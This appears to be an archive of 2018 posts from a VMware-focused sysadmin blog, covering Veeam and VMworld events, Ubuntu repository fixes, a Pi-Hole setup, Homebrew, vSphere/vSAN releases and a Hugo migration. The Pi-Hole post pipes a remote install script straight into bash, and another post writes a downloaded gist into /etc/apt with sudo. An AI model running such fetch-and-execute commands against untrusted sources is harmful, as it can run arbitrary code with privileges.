I won’t go into much detail about the technical content provided by Veeam, since Karl Widmer has already done that in this series of posts: Veeam Vanguard Summit 2018 in Prague – Day 1 Summary Veeam Vanguard Summit 2018 in Prague – Day 2 Summary Veeam Vanguard Summit 2018 in Prague – Day 3 Summary What I will say, however, is that Veeam did an awesome job arranging this event, bringing most of the 2018 class of Vanguards together in Prague. The content was great, and the discussions even better. I’d like to extend my thanks to everyone who contributed, but especially to Rick and his Product Strategy Team (with associates). You guys rock! Perhaps we need to start calling you the Rockatron from now on. That being said, the summit would simply not have been such a success without the active collaboration and involvement of the Vanguards themselves. It’s one thing to logistically get everyone to meet up, and plan content beforehand, but what really makes it happen is the people attending. I know I have mentioned this before, but I think the level of engagement the Vanguards display is what really makes the program unique. Another thing is that Veeam facilitates, and even encourages, bringing your spouse or significant other(s) with you. They were all welcome to join the evening events, which included dinner Monday night (we actually drank the bar dry…) and a river boat trip on the Wednesday. There were even kids, and small babies (besides the Vanguards), attending this year, which is just awesome! You can even see them in the official Vanguard Summit 2018 photo: As usual, the Vanguards were pretty active on Twitter during the event, and I have personally never seen such an active WhatsApp group ever… Even if the agenda was pretty packed the whole week, I had time to record a quick podcast with the Virtually Speaking Podcast, talking about fire, blood and flood, and I am looking forward to listening to everyone’s war stories once they get published.
Next up: VMworld Europe 2018! — See you there! --- # vSphere VCSA 6.5 Update 2 to 6.7 Update 1 Upgrade Issues URL: https://vNinja.net/2018/10/17/vsphere-vcsa-6.5u2-to-6.7u1-update-issues/ Date: 2018-10-17 Author: christian Tags: VCSA, VMware, vCenter, Blogtober2018 Now that vSphere 6.7 Update 1 has been released, I jumped at upgrading one of my lab environments from 6.5 Update 2 (which was not a supported upgrade path until 6.7 Update 1), and I pretty much immediately ran into issues. After providing all the details to the upgrade wizard from the 6.7 Update 1 ISO, I was greeted by an error. The error log shows a somewhat unhelpful message:
<Errors>
  <Error>
    <Type>ovftool.http.send</Type>
    <LocalizedMsg>
      Failed to send http data
    </LocalizedMsg>
  </Error>
</Errors>
Naturally, my main suspect was DNS (it is always DNS. Or NTP), but both forward and reverse DNS lookups work fine, both for my ESXi hosts and my existing vCenter. Unable to pinpoint this any further, I decided to try using IPs for both the existing vCenter and the target host for my new VCSA (with the migrated data on it), and all of a sudden it worked fine. I do not really know what the problem is, besides it being related to DNS somehow, but the “fix” seems to be to use IP addresses for your environment in the Upgrade Wizard for VCSA. This is not really a fix, but it is a workaround, and it does work. I would love to know why this was a problem, especially since both forward and reverse DNS lookups seem to work just fine in this environment. --- # Veeam Vanguard Summit 2018 - a Precap URL: https://vNinja.net/2018/10/13/veeam-vanguard-summit-2018/ Date: 2018-10-13 Author: christian Tags: Travel, Veeam Vanguard, Veeam, Blogtober2018 For the first time since the Veeam Vanguard program was started in 2015, I will be able to join the Vanguard Summit! This year’s event takes place next week (October 15th to 18th) in lovely Prague, Czechia.
I’ve been in Prague once before, on a school trip when I was 18. I have to admit that I do not really remember much of that trip though, for various reasons best left undocumented… By the looks of it, Veeam has done a great job organizing the event, arranging travel and hotel accommodations for approximately 50 Vanguards from all over the world — that takes some organizing! There will be a really mixed bag of representatives from Brazil, the US, Australia, the Nordics, and all over Europe. This is the Vanguards’ chance to get briefed on new developments, but it is also a great way to provide feedback to Veeam. One of the really nice things about the Vanguard program is the two-way street nature of it; it’s not just one-way communication from Veeam, they listen as well. The event agenda looks great too, with a good mix of public content, embargoed content and even some Rickatron special TOP SECRET content. There is even some “responsible enjoyment” planned in the evenings, and a boat trip with dinner on the Wednesday. Thanks a lot to Rick and the rest of the Veeam Vanguard crew for arranging this. I am really looking forward to meeting a slew of old friends and, even more fun, a bunch of new ones I have yet to meet, at least physically. I will be bringing my camera, and hopefully I’ll get some good shots of Old Town Prague, especially since the hotel we are staying at is very centrally placed. Even the weather seems to be cooperating this week, with good autumn temperatures and sun! That will make for a great break from the near-constant rain we’ve had here in Bergen, Norway for the last month or so.
--- # Ubuntu 18.04.1 LTS Bionic Beaver Missing Entries in sources.list URL: https://vNinja.net/2018/10/08/ubuntu-18.04.1-lts-bionic-beaver-sources.list/ Date: 2018-10-08 Author: christian Tags: Ubuntu, Linux, Blogtober2018 While setting up a new Ubuntu 18.04.1 LTS Bionic Beaver VM (which I will be using for a couple of upcoming projects using Grafana and InfluxDB, as well as Pi-Hole), I ran into a small issue where /etc/apt/sources.list was close to empty:
fsociety@test:~$ cat /etc/apt/sources.list
deb http://archive.ubuntu.com/ubuntu bionic main
deb http://archive.ubuntu.com/ubuntu bionic-security main
deb http://archive.ubuntu.com/ubuntu bionic-updates main
fsociety@test:~$
That does seem a bit too scaled-down, doesn’t it? Turns out systems that are installed with the Ubuntu 18.04.1 LTS Bionic Beaver live server installer do not have all the normal Ubuntu repositories added. In fact, the Universe, Multiverse and Restricted repositories are missing. I don’t know if this is a bug that will be fixed, or an intentional change, but it means that a lot of packages you might need are not available for installation after completing the Ubuntu OS setup. And that is simply no fun at all. Either way, I’ve hacked together my own version (basically copied from older releases) of a full sources.list file, and made it available as a gist.
This can easily be downloaded onto your Ubuntu 18.04.1 LTS Bionic Beaver system, after taking a backup of the original one: Backup the original /etc/apt/sources.list #
fsociety@test:~$ sudo mv /etc/apt/sources.list /etc/apt/sources.list.backup
Download my updated /etc/apt/sources.list #
fsociety@test:~$ cd /etc/apt/
fsociety@test:~$ sudo wget https://gist.githubusercontent.com/h0bbel/4b28ede18d65c3527b11b12fa36aa8d1/raw/a4ab1c13a92171822215143b1e3b3eb6add7a78d/sources.list
This should add your familiar repositories back, and enable installation of packages from the missing repositories, as well as the main repositories enabled by default. You can test it by running a simple apt-get update command:
sudo apt-get update
[sudo] password for fsociety:
Get:1 http://security.ubuntu.com/ubuntu bionic-security InRelease [83.2 kB]
Hit:2 http://us.archive.ubuntu.com/ubuntu bionic InRelease
Get:3 http://us.archive.ubuntu.com/ubuntu bionic-updates InRelease [88.7 kB]
Get:4 http://us.archive.ubuntu.com/ubuntu bionic-updates/main amd64 Packages [398 kB]
Get:5 http://us.archive.ubuntu.com/ubuntu bionic-updates/main Translation-en [149 kB]
Get:6 http://us.archive.ubuntu.com/ubuntu bionic-updates/restricted amd64 Packages [7024 B]
Get:7 http://us.archive.ubuntu.com/ubuntu bionic-updates/restricted Translation-en [3076 B]
Get:8 http://us.archive.ubuntu.com/ubuntu bionic-updates/universe amd64 Packages [559 kB]
Get:9 http://us.archive.ubuntu.com/ubuntu bionic-updates/universe Translation-en [145 kB]
Get:10 http://us.archive.ubuntu.com/ubuntu bionic-updates/multiverse amd64 Packages [5716 B]
Get:11 http://us.archive.ubuntu.com/ubuntu bionic-updates/multiverse Translation-en [3176 B]
Fetched 1441 kB in 3s (532 kB/s)
Reading package lists... Done
And there you go: the Universe, Multiverse and Restricted repositories are now available, in addition to the default Main. Happy days!
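If you would rather not pull a file off the internet, the same result can be had by editing /etc/apt/sources.list yourself. The gist follows the standard Ubuntu layout; a minimal sketch of what re-enabling all four components looks like (mirror URLs may differ from the ones in the gist):

```
# /etc/apt/sources.list — main, restricted, universe and multiverse for bionic
deb http://archive.ubuntu.com/ubuntu bionic main restricted universe multiverse
deb http://archive.ubuntu.com/ubuntu bionic-updates main restricted universe multiverse
deb http://archive.ubuntu.com/ubuntu bionic-backports main restricted universe multiverse
deb http://security.ubuntu.com/ubuntu bionic-security main restricted universe multiverse
```

Alternatively, running sudo add-apt-repository universe (and similarly for multiverse and restricted) should achieve much the same on 18.04, followed by an apt-get update.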
Ubuntu 18.04.1 LTS Bionic Beaver /etc/apt/sources.list gist --- # My Pi-Hole Setup URL: https://vNinja.net/2018/10/08/my-pi-hole-setup/ Date: 2018-10-08 Author: christian Tags: Pi-Hole, DNS, Linux, Ubuntu, Blogtober2018 I recently configured a VM with Pi-Hole installed on it, and after running it for a couple of weeks the results are pretty stunning. That is a lot of blocked requests, and I have to say that everything just feels faster, even on my 250 Mbps fiber connection. After playing around with it for a bit, and configuring some of my clients to use it, I decided to go all in. The high-level architecture I finally settled on looks like this: Basically, I want all DNS requests in my local network to run through the Pi-Hole, then to my local DNS server, before they get forwarded out on the big bad interwebs. Currently my Synology NAS also serves as my DHCP and DNS server for my local network. The setup will be similar on whatever DHCP and DNS servers you currently run. In order to get Pi-Hole to filter all my traffic, I configured the DHCP scope to serve the IP address of the Pi-Hole, 192.168.5.53 (bonus points for figuring out why it’s .53), like this. This takes care of any client getting their IP through DHCP, and also sets the Synology (192.168.5.67) itself as the secondary DNS in case the Pi-Hole is not responding for some reason. To make sure external name resolution works too, I’ve configured the Synology DNS server to forward to my external DNS servers of choice, 1.1.1.1 and 1.0.0.1, powered by Cloudflare. Next up was configuring the Pi-Hole itself to forward non-blocked DNS requests to the internal Synology DNS service, and let that handle resolution, either local or external.
Thankfully this is a pretty easy configuration as well, this time in the Pi-Hole admin interface, which is available at http://pi.hole/admin. Go to Settings -> DNS and set your custom upstream DNS servers. I’ve set mine to first point to my Synology, and if that fails, to go directly to 1.1.1.1. This way I have backup DNS servers both from DHCP and inside of Pi-Hole itself, should either the Pi-Hole VM or the Synology be unavailable (for DHCP I have a backup DHCP scope configured in my router, and activate that should there be a need). Conditional Forwarding # In order to get local name resolution to work properly through Pi-Hole, I also had to configure another setting in Pi-Hole itself. At the bottom of the Settings -> DNS page, under Advanced DNS settings, you’ll find something called Use Conditional Forwarding. Configuring this to point to your local DNS server, as well as typing in the local domain name, enables Pi-Hole to forward everything that should be local to the correct DNS server. Disregard the text explaining that you should point it to your router; it should really point to your local DNS resolver (which in many home networks is in fact your router, but not in my case). I could probably have used external DNS servers for the custom DNS servers for Pi-Hole, and just used this Conditional Forwarding for my local network, but I haven’t tested that, and frankly I don’t really care if external DNS queries take an extra hop through the local DNS server after hitting the Pi-Hole. This setup also allows for ad- and tracker-free browsing when I VPN into my home network while on the move, since I’m technically just a client on the local network once I’ve connected, either from my phone or my laptop — that’s a huge bonus, since not only is my traffic encrypted, it’s also sanitized at the same time.
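Under the hood, Pi-Hole is dnsmasq-based, and conditional forwarding boils down to a couple of dnsmasq directives. A sketch of the effective configuration, assuming the Synology at 192.168.5.67 from this post and a hypothetical local domain name of lan:

```
# Forward queries for the local domain to the internal DNS server
server=/lan/192.168.5.67
# Forward reverse (PTR) lookups for the 192.168.5.0/24 subnet the same way
server=/5.168.192.in-addr.arpa/192.168.5.67
```

Pi-Hole writes the equivalent of these lines into its dnsmasq configuration (typically under /etc/dnsmasq.d/) when you enable Use Conditional Forwarding, so you normally never need to edit them by hand.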
--- # Trouble Installing Pi-Hole on Ubuntu 18.04.1 LTS Bionic Beaver URL: https://vNinja.net/2018/10/08/installing-pihole-on-ubuntu-18.04.1/ Date: 2018-10-08 Author: christian Tags: Ubuntu, Linux, Blogtober2018, Pi-Hole Pi-Hole is a nifty little software package that acts as an ad- and tracking-blocking server for your entire network, or as the authors put it: Pi-Hole®: A Black Hole for Internet Advertisements. In reality it’s just a local DNS server that blocks out known advertising networks from your queries. Originally designed to run on a Raspberry Pi (hence the name), it can also run just fine on any Debian-based Linux distribution, and it works just fine inside a VM. It is very lightweight, as it only handles DNS queries and returns a blank HTML file for the blocked requests; it really doesn’t need much processing power. Hardware requirements # ~52MB of free space 512 MB RAM Installation of Pi-Hole is normally pretty straightforward, if you like to install things directly off the internet, that is… Once you have your VM ready, with a static IP, SSH into it and run:
fsociety@test:/$ curl -sSL https://install.pi-hole.net | bash
In my case, on Ubuntu 18.04.1 LTS Bionic Beaver, this seemed to run fine, but after a very quick screen flash, it just stopped, looking like this:
fsociety@test:/$ curl -sSL https://install.pi-hole.net | bash
[✗] Root user check
[i] Script called with non-root privileges
[i] The Pi-hole requires elevated privileges to install and run
[i] Please check the installer for any concerns regarding this requirement
[i] Make sure to download this script from a trusted source
[✓] Sudo utility check
[✓] Root user check
[Pi-hole ASCII art banner]
[✓] Disk space check
[✓] Update local cache of available packages
[✓] Checking apt-get for upgraded packages... up to date!
[i] Installer Dependency checks...
[✓] Checking for apt-utils
[i] Checking for dialog (will be installed)
[✓] Checking for debconf
[i] Checking for dhcpcd5 (will be installed)
[✓] Checking for git
[✓] Checking for iproute2
[✓] Checking for whiptail
fsociety@test:/$

Well, that is strange. It just stopped, with no error messages or anything. Turns out the reason it stopped here is that the dialog and dhcpcd5 packages are missing from the system and it is unable to install them, even if it does say that they “will be installed”. Dialog is basically a utility that lets you build user interfaces for scripts, and guess what? The Pi-hole installer depends on it being available. Since installations of Ubuntu 18.04.1 LTS Bionic Beaver using the LiveCD ISO are missing the Universe repositories, the Pi-Hole installer is unable to install its requirements, and just stops in its tracks. To get any further, you will have to fix your sources.list to make sure you have the Universe repositories. Once that is done, re-run the Pi-Hole installer and it should run just fine, presenting you with a screen similar to this: From there, you can go on and configure it to suit your setup. I will not go through the configuration of Pi-Hole in this post; I will save that for a later post where I go through how it is configured in my home network, with internal upstream DNS servers. My setup also makes this my default DNS server for VPN connections, making me ad-blocked while mobile as well. Awesome. I will say this though, this thing works extremely well: That’s nearly 24% of all requests from my home network blocked before it hits the internet. That is a lot!
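The repository fix itself is a one-liner on 18.04 (`sudo add-apt-repository universe && sudo apt update`). If you would rather edit sources.list by hand, the change amounts to adding the universe component to the deb lines. A minimal sketch, run against a scratch copy rather than the real /etc/apt/sources.list:

```shell
# Demo on a scratch file; on a real host you would edit /etc/apt/sources.list
# (or simply run: sudo add-apt-repository universe && sudo apt update)
cat > /tmp/sources.list <<'EOF'
deb http://archive.ubuntu.com/ubuntu bionic main
deb http://archive.ubuntu.com/ubuntu bionic-updates main
EOF
# Append the universe component to every deb line that lacks it
sed -i '/^deb /{/universe/!s/$/ universe/}' /tmp/sources.list
grep -c universe /tmp/sources.list   # -> 2
```

After the real sources.list has universe on its deb lines, `apt update` followed by re-running the Pi-Hole installer should get past the dependency checks.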
--- # macOS: Homebrew error in macOS 10.14 Mojave URL: https://vNinja.net/2018/09/25/homebrew-in-mojave/ Date: 2018-09-25 Author: christian Tags: Homebrew, macOS

Just a quick note to everyone jumping on the new macOS Mojave release. I’m a big fan of Homebrew, and after upgrading macOS I figured it would be a good idea to upgrade Homebrew as well.

 ~ $ brew update
==> Downloading https://homebrew.bintray.com/bottles/git-2.18.0.mojave.bottle.ta ...
==> Summary
🍺 /usr/local/Cellar/git/2.18.0: 1,488 files, 296.7MB
Error: Git must be installed and in your PATH!

Well, that’s strange, Homebrew was working just fine before the upgrade. Turns out that the Mojave upgrade didn’t also upgrade my Xcode Command Line Tools, which causes this error when upgrading Homebrew. Luckily there is a really quick fix for this; just install the Xcode Command Line Tools!

 ~ $ xcode-select --install
xcode-select: note: install requested for command line developer tools

Let that run, and Homebrew upgrades itself without problems.

 ~ $ brew update
Updated 2 taps (homebrew/core, homebrew/cask).

I’m expecting some other updates to Homebrew soonish, since it still considers Mojave (macOS 10.14) to be a pre-release version, so official support isn’t quite there yet.

--- # VMworld Europe 2018 Sessions and Some Advice URL: https://vNinja.net/2018/09/25/vmworld-europe-2018-sessions/ Date: 2018-09-25 Author: christian Tags: VMworld, VMware, VMworld 2018

Get your scheduling hat on, and get on it now before all the sessions you would like to attend are unavailable! VMware has opened the session builder for VMworld Europe 2018, and quite a few sessions are already fully booked. Do not despair though; if your chosen session is full, there is still a chance that some sessions will get additional slots, as well as the possibility for walk-ins at the time of the sessions.
Odds are that quite a few people who have scheduled a given session won't show up, and that will open up slots for those waiting at the door. There is also the option to download the sessions you don’t get a chance to attend live. Check out William Lam’s list of Direct playback & download URLs for all VMworld 2018 US Sessions — the European ones will naturally be available after VMworld Europe 2018.

As a rather seasoned VMworld attendee, I will offer some advice: Do not go overboard when scheduling. It’s easy to cram loads of sessions into your schedule, but if you do that I can guarantee that you will not be able to attend them all! You do not want to have 3 days fully packed with sessions, end-to-end, without a chance to breathe between them. You will only end up running between conference rooms, and wear yourself out to the point where you will not be able to absorb the information in the sessions you attend anyway. Pick a select subset of the sessions. Check their descriptions properly, and make sure they are at the level of technicality you’re looking for. There is quite a difference between an overview and a deep dive, or at least there should be. If you are in doubt, you are probably better off downloading the US version of the session and watching it when you have time, or waiting until the European video is published and watching it after the conference.

A couple of other scheduling tips #

The sessions are not listed by day, but if you search for “tuesday”, you’ll get the sessions for that day. Use the My Schedule view to pick a time slot you want to fill, hit the + sign and find a session for that slot. This makes it easier to make sure you have air between your scheduled sessions! Use the Add Personal Time option wisely. Take blocks of time out of your schedule, and think about what you want to use it for. Perhaps visit the Solutions Expo and that vendor booth you wanted to check out, or hang out in the blogger space.
Check out the VMTN/vBrownbag schedule (search for VMTN); loads of great content is scheduled there as well, so make sure you account for that too. VMworld is so much more than the sessions. It is fun, and for many (including me) it’s mostly about meeting new and old friends, and frankly, it is exhausting. Remember to take time to decompress and relax as well! VMworld is a marathon, not a sprint! See you there!

--- # macOS: Lulu URL: https://vNinja.net/2018/09/12/software-lulu/ Date: 2018-09-12 Author: christian Tags: macOS, Firewall, Security

LuLu is a small, shared-source macOS application-level firewall that’s finally reached v1.0. Unlike other macOS firewall solutions, LuLu is 100% free, with no ads and no trial version. I’ve been using it on my home Mac Mini for a while, and it works perfectly — Most of the time I don’t even notice it’s there, until a new application or service tries to access anything on the network, when it pops up asking if that’s ok. Perfect. For more details, check the official site.

--- # Headshot Studio @ VMworld Confirmed URL: https://vNinja.net/2018/09/10/headshot-studio@vmworld-confirmed/ Date: 2018-09-10 Author: christian Tags: VMworld, VMware, vExpert

I’m very happy to announce that I can now confirm that Headshot Studio @ VMworld will happen! Mainly due to Tom Dodds and 10ZiG, who have stepped up as a sponsor! This means I’ll be able to set up a small headshot studio, complete with multiple light sources, a background, and softboxes! Huge thanks to both Tom and 10ZiG! I’m still looking for a place at the Fira to host it all, as well as the details on how to actually organize it, but so far so good. The logistical challenges of getting the required equipment to Barcelona have been solved; the rest is pretty much up to me. I have a couple of feelers out there with regards to the physical location, but I’ll have to get back to that closer to the event. Thanks to Dave Simpson, who coined the term HaaS aka Headshot-as-a-Service for this!
I’d be up for this too, great idea and offer mate! Headshot as a Service #HaaS — Dave Simpson (@bfd_diplomacy) September 3, 2018

I’d also like to thank the vBrownbag crew, who are actively supporting this! Thanks for all you do for the vCommunity guys, it’s greatly appreciated! More details to come closer to VMworld Europe 2018, including more details on the where, when and how, as well as a sign-up form. See you there!

--- # IT Architect Series: Designing Risk in IT Infrastructure URL: https://vNinja.net/2018/09/04/designing-risk-in-it-infrastructure/ Date: 2018-09-04 Author: christian Tags: Recommended, Reading, Books

Designing Risk in IT Infrastructure #

Disclaimer: I have contributed to this book as a reviewer, for no compensation other than receiving a free copy.

Another must-have book for system administrators and architects has been published! By Daemon Behr. Paperback: 416 pages. Publisher: Daemon Behr (August 10, 2018). Language: English.

This book will help you understand what risk really is, a variety of different risk factors, and how to mitigate them. Do you know what risks exist for a given solution, and why? Do you factor in, and calculate, risk when designing the architecture? If so, how do you do it? Risk analysis, do we need it? Daemon does a great job explaining all of this, and risk analysis is an often underappreciated exercise that we leave too late in the design process:

A book that talks about the thing we often overlook when designing solutions for anyone….the inherent trade off between risk/cost/functionality. https://t.co/6y3yXwv5jk — Mark Gabryjelski (@MarkGabbs) August 30, 2018

Besides having a wealth of information, perhaps sometimes too much to ingest in a single sitting, it’s also packed with great (and funny) examples, quotes and historical factoids. This is a book you’ll have to read more than once, and use as a reference later on. This book shows you how to not be a pig.
Daemon Behr in Designing Risk in IT Infrastructure

Order Designing Risk in IT Infrastructure now, I promise you won't regret it. This is the third book in the IT Architect Series, after Foundation In the Art of Infrastructure Design: A Practical Guide for IT Architects and The Journey: A Guidebook for Anyone Interested in IT Architecture. Note: My recommendation of the book is based on the chapters I’ve reviewed, and not the final printed product.

--- # Headshot Studio @VMworld? URL: https://vNinja.net/2018/09/02/headshot-studio@vmworld/ Date: 2018-09-02 Author: christian Tags: VMworld, VMware, vExpert

Over the last couple of weeks an idea started to form, an idea that would try to combine two of my passions: the vCommunity and photography. In short, the idea is to set up some kind of mini-studio at VMworld Europe, and offer free headshots to those who might be interested. And yes, it’ll be me doing the photography, not some fancy pro photographer.

I’m considering setting up a photo “headshot studio” at #VMworld Europe, and some kind of schedule/signup. Would anyone be interested in that? The idea is to take free Profile/CV shots for anyone interested (time permitting). — Christian Mohn™ (@h0bbel) September 2, 2018

So far there seems to be quite a bit of interest in doing this, so I’ll try to make it happen! I’ll show up with my camera, you just show up. I might have bitten off more than I can chew though, especially considering that there were 14,000 attendees at VMworld Europe 2017. I have no idea, yet, what my schedule at VMworld Europe 2018 looks like, but my plan is to block out an hour of each conference day (5-8 November) for this, on a first-come-first-served basis. The plan is to set up the small studio, take the headshots, and publish them all publicly (probably in a Flickr album) with a Public Domain Dedication (CC0) license — Free for all to use.
Of course, there are quite a few practical and logistical issues to deal with in order to actually make this a reality. Most pressing is the need for a proper location for the shoots, or getting hold of a backdrop setup that I can use anywhere. All of the collapsible backdrops I’ve found so far are simply too large for me to stick in my suitcase. If someone reading this works for a vendor that would be interested in sponsoring this, please reach out and perhaps we can work something out. I’m not talking about huge monetary sponsorships here, perhaps only some help with getting hold of some cheapish equipment and some logistics.

--- # VMware Cloud on AWS — New Amazon EC2 elastic, bare-metal instance for vSAN URL: https://vNinja.net/2018/08/26/vmware-cloud-on-aws-news/ Date: 2018-08-26 Author: christian Tags: VMware, VMworld 2018, VMware Cloud on AWS

VMware vSAN utilizing Amazon Elastic Block Storage (EBS) is an interesting one. Being able to independently increment storage in the VMC without adding compute nodes is a feature that has been missing, until now. Customers of VMware Cloud on AWS will now be able to scale storage independently of compute, by adding new EBS storage nodes.

Overview #

R5.Metal Physical Host Configuration #
- 3 disk groups per host
- All storage provided by EBS GP2
- Raw capacity tier of 15-35TB, configured at cluster creation, in 5TB increments
- Compression enabled

| Item | Available |
| --- | --- |
| CPU | Skylake-SP |
| Sockets per Host | 2 |
| Cores per Socket | 24 |
| Cores per Host | 48 |
| Threads per Host | 96 |
| Memory | 768 GB |
| Storage | EBS GP2 |
| NICs | 1 x ENA |

Note: This new storage cluster needs to be added to an existing SDDC, and cannot be the first cluster that is provisioned in the customer environment.

--- # VMware vSAN 6.7u1 — What's New? URL: https://vNinja.net/2018/08/26/vsan67u1-whats-new/ Date: 2018-08-26 Author: christian Tags: vSAN, VMware, VMworld 2018

VMworld 2018 US is upon us, and as per usual this means a lot of new announcements.
One of them is vSAN 6.7u1, which comes with a bunch of new and useful features. This release mainly focuses on improved operations and maintenance, with a bunch of nice new additions. I’ve focused on a couple of them here, but this is not a definitive list!

Simplified Upgrade Experience Through VMware Update Manager (VUM) #

Firmware and drivers for vSAN have now been moved into VMware Update Manager (VUM) for centralized management; this means that the vSAN IO Controller Firmware Tool is now integrated into VUM.

Features #
- Retrieves and updates firmware for the vSAN cluster
- Supports custom ISOs for OEM-specific builds
- Supports Dell HBA330 updates
- Supports vCenter without internet connectivity
- Per-host updating with additional safeguards
- Included in system-managed baselines

Cluster Quickstart #

The vSphere Cluster Quickstart is a new cluster, host and network configuration workflow. It enables easy addition of new or existing hosts, in bulk, with built-in pre-checks and recommendations. It complements the vSAN Easy Install wizard, for end-to-end greenfield deployments.

Improved Space Efficiency Using Storage Reclamation #

Yes! Finally we get space reclamation from guests on vSAN as well, through TRIM/UNMAP integration.

Features #
- Reclaims guest OS capacity
- Reclaims storage for vSAN
- Reduces use of the destager
- Supports guest OS initiated TRIM/UNMAP commands
- Windows Server 2012 or Windows 8 and newer
- Linux supporting ext4, xfs, btrfs, etc.
- Automated using guest OS online mode
- Scheduled mode supported

Improved Resource Decommissioning Safeguards #

'Enter Maintenance Mode' (EMM) operational improvements, which include:
- An EMM “fail fast” pre-check simulation, which determines success/failure with no data movement
- New warnings for: hosts already in maintenance mode, ongoing resyncs, and multiple decommission actions
- Object repair timer adjustment available in the UI

Other items #
- Improved vSAN cluster capacity insight, with historical capacity, deduplication and compression reports
- A new usable capacity estimator, which takes the selected storage policy into account, and easy estimation of “what if” when using space-efficient RAID-5/6
- Enhancements to vRealize Operations within vCenter, where dashboards are now capable of displaying vSAN stretched cluster intelligence, with full interoperability with vRealize Operations v7.0
- New PowerCLI 10.2 cmdlets that replace 18 Ruby vSphere Console (RVC) commands. Greater visibility into cluster configuration info, resyncing status, health check object info and status, as well as vSAN disk stats

There are other improvements as well, but I’ll leave those for a later post — Preferably once I get my hands on the actual vSAN 6.7u1 bits! Happy VMworld everyone, and happy 20 Year Anniversary VMware!

--- # VMware vSphere 6.7u1 — What's New? URL: https://vNinja.net/2018/08/26/vphere67u1-whats-new/ Date: 2018-08-26 Author: christian Tags: vSphere, VMware, VCSA, VMworld 2018

vSphere 6.7u1 Announced at VMworld 2018 US #

Another VMworld, another vSphere announcement. vSphere 6.7u1 comes with a bunch of new features and capabilities, some of which are listed below:

Feature Complete HTML5 Client #

Finally the HTML5 client is feature complete! It’s been a long wait, but in v6.7u1 it’s here! With improved search, support for Auto Deploy, Host Profiles and vCenter High Availability (VCHA), this is your new home as a vSphere admin.
vCenter Appliance Improvements #

vCenter High Availability (VCHA)
- vSphere Client (HTML5) improved workflow
- Auto-detects when VCSA is being managed
- REST APIs
- Auto clone creation option for passive and witness nodes

Monitoring & Alerting
- Built-in firewall: the vCenter Appliance now comes with a built-in firewall that is managed through the VAMI.

Converge Tool
- This new tool enables moving external PSCs (even load-balanced ones) into an embedded PSC, which is the preferred option going forward.

Improved Content Library
- Deploy from, Clone to, and Sync OVF and OVA templates
- Guest customization
- Support for native OVA and VMTX Deploy from or Clone to
- ISO mounting support
- Store other files, such as scripts

Cluster Quickstart
- The vSphere Cluster Quickstart is a new cluster, host and network configuration workflow. It enables easy addition of new or existing hosts, in bulk, with built-in pre-checks and recommendations. This complements the vSAN Easy Install wizard, for end-to-end greenfield deployments.

Happy VMworld everyone, and happy 20 Year Anniversary VMware!

--- # Book Recommendations August 2018 URL: https://vNinja.net/2018/08/16/book-recommendations/ Date: 2018-08-16 Author: christian Tags: Recommended, Reading, Books

Book Recommendations August 2018 #

Every now and then new vSphere-related “must-have” books are released, and this month there are no less than two of them, namely vSphere 6.7 Clustering Deep Dive and VDI Design Guide: A comprehensive guide to help you design VMware Horizon, based on modern standards.

vSphere 6.7 Clustering Deep Dive #

This updated version (the 5th) covers vSphere 6.7, and it’s a real brick. Written by Frank Denneman, Duncan Epping and Niels Hagoort, clocking in at 566 pages in total, it contains a wealth of knowledge!
Topics covered:
- vSphere HA
- vSphere DRS
- vSphere Storage DRS
- vSphere Storage I/O Control
- vSphere Network I/O Control
- vSphere Stretched Clusters

I’d like to highlight the last one on that list: Stretched Clusters, or vSphere Metro Storage Cluster (vMSC). This chapter is an entire use case, with requirements and constraints and a real-world implementation scenario. It includes, amongst other things, DRS/HA settings, affinity rules, and detailed failure scenarios. That chapter alone is worth the cost of the book! Combined with the vSphere 6.5 Host Resources Deep Dive, you get the vSphere 6.x Deep Dive Resource Kit — Something that every vSphere administrator out there should have readily available. I’ve purchased both of these for the entire SDDC team in Proact Norway; they are just that essential.

VDI Design Guide: A comprehensive guide to help you design VMware Horizon, based on modern standards #

The winner when it comes to the longest book title, by far, is this book by Johan van Amersfoort (The Bearded VDI Junkie). Besides its long and impressive title, it is a must-have for anyone looking at Virtual Desktop Infrastructure (VDI) for their environment. Based on the VMware VCDX methodology, it guides you through the many potential pitfalls when it comes to virtualizing your desktops and end-user applications, as well as serving as a great go-to reference. Real-world scenarios always make for the best learning experience, and this book is based around just that.

Topics covered:
- Sizing
- Multi-site Architectures
- VDI in SDDC environments (NSX/vSAN)
- Profile Strategies
- Application Delivery
- Windows 10 as a VDI Desktop OS
- Monitoring and Security
- GPUs

Well done Johan, and I love those whiteboard-style diagrams! Support these great authors and their efforts, and grab your copies now! Trust me, they're all well worth it!
--- # Migrating From Wordpress to Hugo URL: https://vNinja.net/2018/07/22/migrating-from-wordpress-to-hugo/ Date: 2018-07-22 Author: christian Tags: vninja, site, news, hugo, wordpress

Migrating From Wordpress to Hugo, aka The Long and Winding Road. When I decided to move away from Wordpress and over to Hugo, I really had no concept of the amount of work it would be. Simply put, I just decided to do it — without really knowing what I had set out to do. Once I had decided on a foundation theme (I chose Hugo Bootstrap Premium as my starting point), the real work started. The first challenge was to get all the existing content moved over to Hugo. Hugo is entirely Markdown based, which meant I would have to find a way to export all the Wordpress posts in a format that Hugo could work with. I tried several Wordpress-based plugins that really didn’t get the job done, either because the plugin itself had issues, or because my hosting provider's setup didn’t match the requirements (or timed out while trying). In the end, I decided to give Exitwp a try. In essence, Exitwp works with a “normal” Wordpress XML export, which meant that I could do an export, and then work with the exported data locally (for details, check the documentation). While Exitwp is designed for use with Jekyll, it works perfectly fine with Hugo as well. Basically what Exitwp does is convert the existing Wordpress posts into Markdown files, with the publish date and post title as the filename (example: 2018-01-29-bootbank-cannot-be-found-at-path.md). This created a great foundation, as all the existing posts were now converted to Markdown, with the existing metadata in the Front Matter.
After conversion, my posts' Front Matter looked like this example:

---
author: cmohn
comments: true
date: 2018-01-29 22:49:53+00:00
type: post
slug: bootbank-cannot-be-found-at-path
title: Alerting on "Bootbank cannot be found at path ‘/bootbank’" in vRealize Operations
url: /vmware-2/bootbank-cannot-be-found-at-path/
wordpress_id: 4963
categories:
- VMware
tags:
- Alerting
---

